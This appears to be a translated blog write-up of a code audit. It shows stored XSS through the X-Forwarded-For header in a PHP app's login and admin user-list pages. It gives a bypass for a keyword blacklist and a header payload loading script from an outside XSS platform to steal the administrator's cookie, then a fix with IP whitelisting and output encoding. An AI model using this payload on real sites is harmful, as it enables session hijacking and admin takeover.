Preface:
Everyone is surely familiar with x-forwarded-for: it is used to obtain the client's IP address and is very widely used in real-world development. The main topic of today's post is injecting XSS code through x-forwarded-for to obtain the administrator's cookie.
The source code audited is still the install.php reinstallation vulnerability source from last time.
Steps:
1. Visit the normal user login page, as follows:
2. Find the corresponding file in the source code and audit it; the code is as follows:
<?php
include_once('../sys/config.php');
if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
    $clean_name = clean_input($_POST['user']);
    $clean_pass = clean_input($_POST['pass']);
    $query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
    $data = mysql_query($query, $conn) or die('Error!!');
    if (mysql_num_rows($data) == 1) {
        $row = mysql_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        $_SESSION['avatar'] = $row['user_avatar'];
        $ip = sqlwaf(get_client_ip()); // obtain the client IP address
        $query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
        mysql_query($query, $conn) or die("updata error!");
        header('Location: user.php');
    }
    else {
        $_SESSION['error_info'] = '用戶名或密碼錯誤';
        header('Location: login.php');
    }
    mysql_close($conn);
}
else {
    not_find($_SERVER['PHP_SELF']);
}
?>
3. From the code above we can see that $ip = sqlwaf(get_client_ip()); is used to obtain the client's IP address, but the value first passes through the sqlwaf() function. Following sqlwaf(), its code is as follows:
function sqlwaf( $str ) {
    $str = str_ireplace( "and", "sqlwaf", $str );
    $str = str_ireplace( "or", "sqlwaf", $str );
    $str = str_ireplace( "from", "sqlwaf", $str );
    $str = str_ireplace( "execute", "sqlwaf", $str );
    $str = str_ireplace( "update", "sqlwaf", $str );
    $str = str_ireplace( "count", "sqlwaf", $str );
    $str = str_ireplace( "chr", "sqlwaf", $str );
    $str = str_ireplace( "mid", "sqlwaf", $str );
    $str = str_ireplace( "char", "sqlwaf", $str );
    $str = str_ireplace( "union", "sqlwaf", $str );
    $str = str_ireplace( "select", "sqlwaf", $str );
    $str = str_ireplace( "delete", "sqlwaf", $str );
    $str = str_ireplace( "insert", "sqlwaf", $str );
    $str = str_ireplace( "limit", "sqlwaf", $str );
    $str = str_ireplace( "concat", "sqlwaf", $str );
    $str = str_ireplace( "script", "sqlwaf", $str );
    $str = str_ireplace( "\\", "\\\\", $str );
    $str = str_ireplace( "&&", "sqlwaf", $str );
    $str = str_ireplace( "||", "", $str );
    $str = str_ireplace( "'", "", $str );
    $str = str_ireplace( "%", "\%", $str );
    $str = str_ireplace( "_", "\_", $str );
    return $str;
}
4. This filtering code can in fact be bypassed to perform injection. Take <script>alert(/xss/)</script> as an example: entering <s||cript>alert(/xss/)</s||cript> is enough to get past sqlwaf() (work out the principle yourselves from the sqlwaf() code: the "script" keyword is replaced before "||" is stripped to an empty string, so the split token never matches the blacklist and is reassembled afterwards).
Now that we know how to bypass it, before logging in we use Burp Suite or Modify Headers (a browser extension) to change x-forwarded-for to: <sCRiPt/SrC=//xsshs.cn/UOZf> (code from my own XSS platform).
Burp Suite method:
Modify Headers method:
5. After logging in successfully, since everything is set up and audited locally, we open the database to check whether the XSS statement we constructed was carried into the database; we can see it was indeed inserted successfully.
6. Now switch to the administrator account and log in; continuing the audit, we find the administrator's user-view file, with the following code:
<?php
include_once('../sys/config.php');
if (isset($_SESSION['admin'])) {
    include_once('../header.php');
    $query = "SELECT * FROM users ORDER BY user_id";
    $data = mysql_query($query, $conn) or die('Error');
    mysql_close($conn);
?>
<table class="items table">
    <thead>
        <tr>
            <th id="yw0_c0">Id</th>
            <th id="yw0_c4">Name</th>
            <th id="yw0_c4">Ip</th>
            <th id="yw0_c4">Manege</th>
        </tr>
    </thead>
    <tbody>
<?php while ($users = mysql_fetch_array($data)) {
    $html_user_name = htmlspecialchars($users['user_name']);
?>
        <tr class="odd">
            <td><?php echo $users['user_id'];?></td>
            <td><?php echo $html_user_name;?></td>
            <td><?php echo $users['login_ip'];?></td>
            <td><a href="delUser.php?id=<?php echo $users['user_id'];?>">刪除</a></td>
        </tr>
<?php } ?>
    </tbody>
</table>
<a href="manage.php">返回</a>
<?php
    require_once('../footer.php');
}
else {
    not_find($_SERVER['PHP_SELF']);
}
?>
7. From the code analysis above we can see that <?php echo $users['login_ip'];?> echoes the value taken straight from the database without any filtering (note that user_name goes through htmlspecialchars() but login_ip does not), and it is displayed whenever the administrator page is opened.
8. The XSS fires successfully:
9. What follows is logging into the backend with the cookie; it is not demonstrated here, as it is all simple.
Fix:
Add XSS filtering code to sqlwaf(), for example HTML entity encoding.
When the administrator page displays user information, filter strictly.
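As an added example (not code from the audited project or its author), the fix below replaces the keyword blacklist on the login_ip path with a whitelist check, and encodes the value on the administrator page; safe_client_ip() and render_ip_cell() are names assumed for this example, and the sample header values are constructed.

```php
<?php
// Input side: login_ip may only ever hold an IP literal. A blacklist such as
// sqlwaf() can be split around stripped tokens, but filter_var() either returns
// a well-formed IP or false, so markup never reaches the database at all.
function safe_client_ip(string $candidate, string $fallback): string {
    // X-Forwarded-For may carry a comma-separated chain; the first hop is the
    // claimed client, and the whole header is attacker-controlled text.
    $first = trim(explode(',', $candidate)[0]);
    if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
        return $first;
    }
    // Anything that is not an IP literal is discarded in favour of the
    // socket address the server observed itself (REMOTE_ADDR in practice).
    return $fallback;
}

// Output side: encode every stored field before it lands in HTML, so rows
// written before the fix cannot execute in the administrator's browser either.
function render_ip_cell(string $login_ip): string {
    return '<td>' . htmlspecialchars($login_ip, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed sample values for a stand-alone run: php fix_example.php
$remote  = '10.0.0.5';
$samples = [
    '203.0.113.7',
    '203.0.113.7, 198.51.100.9',
    '<s||cript>alert(/xss/)</s||cript>',        // the bypass shown in the write-up
    '<sCRiPt/SrC=//xss-platform.example/x>',    // placeholder, not a real host
];
foreach ($samples as $xff) {
    $ip = safe_client_ip($xff, $remote);
    printf("%-42s -> stored: %-14s rendered: %s\n", $xff, $ip, render_ip_cell($ip));
}
```

The third and fourth samples are stored as 10.0.0.5 rather than as markup, and even a legacy row containing a tag is rendered as inert text by render_ip_cell().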